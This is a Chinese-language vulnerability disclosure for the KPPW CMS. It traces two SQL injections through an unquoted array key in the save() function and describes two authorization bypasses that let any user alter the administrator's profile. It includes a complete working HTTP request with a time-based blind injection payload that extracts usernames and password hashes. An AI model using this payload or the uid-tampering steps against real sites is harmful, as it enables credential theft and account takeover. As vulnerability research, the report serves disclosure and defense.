### 简要描述:
KPPW最新版SQL注入漏洞三(SQL注入及越权操作各两处),附脚本
### 详细说明:
KPPW最新版SQL注入漏洞三(SQL注入及越权操作各两处),附脚本
第一处SQL注入
文件/control/user/account_basic.php:
```
if($intUserRole === 2){
......
}else{
$intAuthStatus = keke_auth_fac_class::auth_check ( "realname", $gUid );
if (isset($formhash)&&kekezu::submitcheck($formhash)) {
if (strtotime($birthday)>=strtotime(date('Y-m-d',time()))) {
$tips['errors']['birthday'] = '出生日期不得大于或等于当前日期';
kekezu::show_msg($tips,NULL,NULL,NULL,'error');
}
if (strtoupper ( CHARSET ) == 'GBK') {
$truename = kekezu::utftogbk($truename );
}
$arrData = array(
'indus_pid' =>$indus_pid,
'indus_id' =>$indus_id,
'truename' =>$truename,
'sex' =>$sex,
'birthday' =>$birthday,
);
$objSpaceT->save($arrData,$pk);
unset($objSpaceT);
kekezu::show_msg('已保存',NULL,NULL,NULL,'ok');
}
}
```
这里在保存基本信息时,变量$pk进入了save函数
跟进save函数,文件/lib/inc/keke_table_class.php:
```
function save($fields, $pk = array()) {
foreach ( $fields as $k => $v ) {
$kk = ucfirst ( $k );
$set_query = "set" . $kk;
$this->_table_obj->$set_query ( $v );
}
$keys = array_keys ( $pk );
$key = $keys [0];
if (! empty ( $pk [$key] )) {
$this->_table_obj->setWhere ( " $key = '" . $pk [$key] . "'" );
$edit_query = "edit_" . $this->_pre . $this->_table_name;
$res = $this->_table_obj->$edit_query ();
} else {
$create_query = "create_" . $this->_pre . $this->_table_name;
$res = $this->_table_obj->$create_query ();
}
if ($res) {
return $res;
} else {
return false;
}
}
```
当$pk[$key]不为空时,$key进入where条件,最后进入>$edit_query,进入sql语句
由于这里的key咋此系统是为全局处理的,也未加引号保护,导致sql注入
第二处SQL注入
文件/control/user/account_contact.php:
```
if (isset($formhash)&&kekezu::submitcheck($formhash)) {
$arrData =array(
'email' =>$email,
'mobile'=>$mobile,
'qq' =>$qq,
'msn' =>$msn,
'phone' =>$phone,
'province'=>$province,
'city'=>$city,
'area'=>$area
);
$intRes = $objSpaceT->save($arrData,$pk);
```
同理变量$pk进入sql语句,原理同上,导致SQL注入漏洞
有因为这里在更新用户基本信息时,where条件是根据用户数据的uid进行update
所以,这里我们可以update任意用户的基本信息了,导致越权操作
同理也能修改任意用户的联系方式
两处SQL注入,两处越权操作
### 漏洞证明:
发送此请求会延迟5秒返回:
```
POST /KPPW2520141118UTF-8/index.php?do=user&view=account&op=basic HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://localhost/KPPW2520141118UTF-8/index.php?do=user&view=account&op=basic
Content-Length: 239
Cookie: PHPSESSID=v8bshmlaa5qi5s47tnbpvulba5
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
formhash=6cb7d4&pk%5Buid%3d5529+and+if(mid((select+concat(username,password)+from+keke_witkey_member+limit+0,1),1,1)%3dchar(97),sleep(5),1)%23%5D=5529&indus_pid=-1&indus_id=-1&truename=%E4%B9%8C%E4%BA%91%E4%B8%80&sex=-1&birthday=1111-11-11
```
看看数据库执行结果
[<img src="https://images.seebug.org/upload/201412/070150135b4361998e372b8b34c9dce5318195d6.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/070150135b4361998e372b8b34c9dce5318195d6.png)
sql语句 成功执行
获取数据使用sqlmap即可
测试代码给出简单跑数据脚本
越权操作,这里我们注册普通用户登录
然后修改联系方式,抓包,修改uid=1,即为admin的uid
[<img src="https://images.seebug.org/upload/201412/07021956e2ee4e0fd7cd2bc8c3b0143baf097cc5.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/07021956e2ee4e0fd7cd2bc8c3b0143baf097cc5.png)
然后即可修改管理员的联系方式
[<img src="https://images.seebug.org/upload/201412/07021631f26170caa602493b4fede70636225c64.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/07021631f26170caa602493b4fede70636225c64.png)
暂无评论